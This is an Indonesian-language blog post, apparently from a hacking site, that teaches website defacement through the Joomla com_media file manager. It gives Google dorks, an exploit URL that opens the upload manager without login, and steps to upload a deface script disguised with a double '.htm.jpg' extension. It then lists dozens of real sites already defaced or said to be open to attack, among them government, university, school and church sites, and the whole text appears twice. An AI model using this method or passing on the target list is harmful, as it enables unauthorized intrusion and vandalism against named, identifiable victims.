Deface Metode Com Media
Assalamualaikum wr wb
Deface Metode Com Media
Ekstensi Yang Bisa Di Upload:Jpg,Txt(Jarang Yg bisa html)
==========================================================
Dork:inurl:com_media
inurl:com_media site:id
(Kembangin Dorknya)
Exploit:/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
==========================================================
Langkah-Langkah:
1.Dorking Di Google
2.Pilih web Yg Vuln Lalu masukan exploitnya
dan otomatis akan masuk ke file manager com_media
3.Lalu Upload Scriptmu Bisa Txt atau Jpg
bisa juga lu Bypas Script Defacemu Jadi htm.jpg(use your brain:V)
4.Lalu Cara Panggil Scriptmu
https://site.com/images/nama-scriptmu.txt
Live Target
http://www.laboliraddi.univ-alger2.dz/images/cache.txt
http://decra.us/images/sad.htm.jpg
http://bkd1.balikpapan.go.id/images/sad.htm.jpg
https://www.hitechindustrial.com.au/images/sad.htm.jpg
https://www.pemadamapi.net/images/sad.htm.jpg
http://www.darkhollowfarm.com/images/sad.htm.jpg
https://www.lighthousebigbend.org/images/sad.htm.jpg
http://www.muoitanthanh.com/images/index(1).html
http://datdatthanh.com/vantindat/images/heker.html
https://www.lighthousebigbend.org/images/sad.htm.jpg
http://churchoftheresurrectionacc.com/images/sad.htm.jpg
https://disin.com.mx/images/sad.htm.jpg
http://psctulsi.antechsolutions.co.in/images/sad.htm.jpg
(Bonus)Web Vuln:V
http://www.laboliraddi.univ-alger2.dz/index.php?option=com_media&view=images&tmpl=component&asset=com_content&author=created_by&fieldid=jform_images_image_intro&folder=
https://www.fajarpengharapan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://rogerdavidfrancis.co.uk/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://tpid.probolinggokota.go.id/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://www.alphadreamz.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.yogaashram.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.sigalon.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://truthnet.org/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.sheric.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_jetestimonial&author=
https://www.msfh.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_jetestimonial&author=
http://fkg.usu.ac.id/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
https://www.crossconnectionscounseling.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1165&author=62
http://bkd1.balikpapan.go.id/index.php/component/media/?view=images&tmpl=component&e_name=jform_changelog&asset=com_jdownloads&author=
https://www.teckell.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
https://www.pemadamapi.net/index.php?option=com_media&view=images&tmpl=component&e_name=product_desc&asset=com_virtuemart&author=
http://decra.us/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
https://sahrc.org.za/index.php?option=com_media&view=images&tmpl=component&e_name=dummyeditor&asset=com_communitysurveys&author=
https://www.hitechindustrial.com.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.lighthousebigbend.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
http://www.ecpc.org/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://sunderlandschools.org.uk/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
http://www.darkhollowfarm.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
https://sacredheartchurch.info/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://www.dmiweb.com.mx/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
http://churchoftheresurrectionacc.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://disin.com.mx/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://psctulsi.antechsolutions.co.in/index.php?option=com_media&view=images&tmpl=component&asset=com_content&author=created_by&fieldid=jform_images_image_intro&folder=
Deface Metode Com Media
Ekstensi Yang Bisa Di Upload:Jpg,Txt(Jarang Yg bisa html)
==========================================================
Dork:inurl:com_media
inurl:com_media site:id
(Kembangin Dorknya)
Exploit:/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
==========================================================
Langkah-Langkah:
1.Dorking Di Google
2.Pilih web Yg Vuln Lalu masukan exploitnya
dan otomatis akan masuk ke file manager com_media
3.Lalu Upload Scriptmu Bisa Txt atau Jpg
bisa juga lu Bypas Script Defacemu Jadi htm.jpg(use your brain:V)
4.Lalu Cara Panggil Scriptmu
https://site.com/images/nama-scriptmu.txt
Live Target
http://www.laboliraddi.univ-alger2.dz/images/cache.txt
http://decra.us/images/sad.htm.jpg
http://bkd1.balikpapan.go.id/images/sad.htm.jpg
https://www.hitechindustrial.com.au/images/sad.htm.jpg
https://www.pemadamapi.net/images/sad.htm.jpg
http://www.darkhollowfarm.com/images/sad.htm.jpg
https://www.lighthousebigbend.org/images/sad.htm.jpg
http://www.muoitanthanh.com/images/index(1).html
http://datdatthanh.com/vantindat/images/heker.html
https://www.lighthousebigbend.org/images/sad.htm.jpg
http://churchoftheresurrectionacc.com/images/sad.htm.jpg
https://disin.com.mx/images/sad.htm.jpg
http://psctulsi.antechsolutions.co.in/images/sad.htm.jpg
(Bonus)Web Vuln:V
http://www.laboliraddi.univ-alger2.dz/index.php?option=com_media&view=images&tmpl=component&asset=com_content&author=created_by&fieldid=jform_images_image_intro&folder=
https://www.fajarpengharapan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://rogerdavidfrancis.co.uk/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://tpid.probolinggokota.go.id/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://www.alphadreamz.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.yogaashram.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.sigalon.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://truthnet.org/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.sheric.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_jetestimonial&author=
https://www.msfh.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_jetestimonial&author=
http://fkg.usu.ac.id/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
https://www.crossconnectionscounseling.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1165&author=62
http://bkd1.balikpapan.go.id/index.php/component/media/?view=images&tmpl=component&e_name=jform_changelog&asset=com_jdownloads&author=
https://www.teckell.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
https://www.pemadamapi.net/index.php?option=com_media&view=images&tmpl=component&e_name=product_desc&asset=com_virtuemart&author=
http://decra.us/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder
https://sahrc.org.za/index.php?option=com_media&view=images&tmpl=component&e_name=dummyeditor&asset=com_communitysurveys&author=
https://www.hitechindustrial.com.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://www.lighthousebigbend.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
http://www.ecpc.org/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://sunderlandschools.org.uk/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
http://www.darkhollowfarm.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
https://sacredheartchurch.info/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://www.dmiweb.com.mx/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
http://churchoftheresurrectionacc.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
https://disin.com.mx/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
http://psctulsi.antechsolutions.co.in/index.php?option=com_media&view=images&tmpl=component&asset=com_content&author=created_by&fieldid=jform_images_image_intro&folder=
Belum ada Komentar untuk "Deface Metode Com Media"
Posting Komentar